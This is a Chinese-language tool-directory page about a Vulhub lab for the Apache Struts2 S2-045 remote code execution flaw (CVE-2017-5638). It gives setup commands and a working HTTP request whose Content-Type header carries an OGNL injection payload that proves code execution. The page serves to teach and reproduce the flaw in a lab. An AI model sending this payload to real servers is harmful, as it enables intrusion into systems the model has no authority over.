Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
vulhub-struts2 — 一个实践实验室,演示如何利用 Vulhub Docker 环境中的 Apache Struts2 关键远程代码执行漏洞(CVE-2017-5638)。包含设置说明和运行易受攻击容器的命令。 | Kitploit
工具/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

一个实践实验室,演示如何利用 Vulhub Docker 环境中的 Apache Struts2 关键远程代码执行漏洞(CVE-2017-5638)。包含设置说明和运行易受攻击容器的命令。

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

S2-045 远程代码执行漏洞(CVE-2017-5638)

影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

漏洞详情:

  • http://struts.apache.org/docs/s2-045.html
  • https://blog.csdn.net/u011721501/article/details/60768657
  • https://paper.seebug.org/247/

漏洞环境

执行如下命令启动struts2 2.3.30:

root@kitploit:~
docker compose up -d

环境启动后,访问http://your-ip:8080即可看到上传页面。

漏洞复现

直接发送如下数据包,可见233*233已成功执行:

root@kitploit:~
POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data


下载工具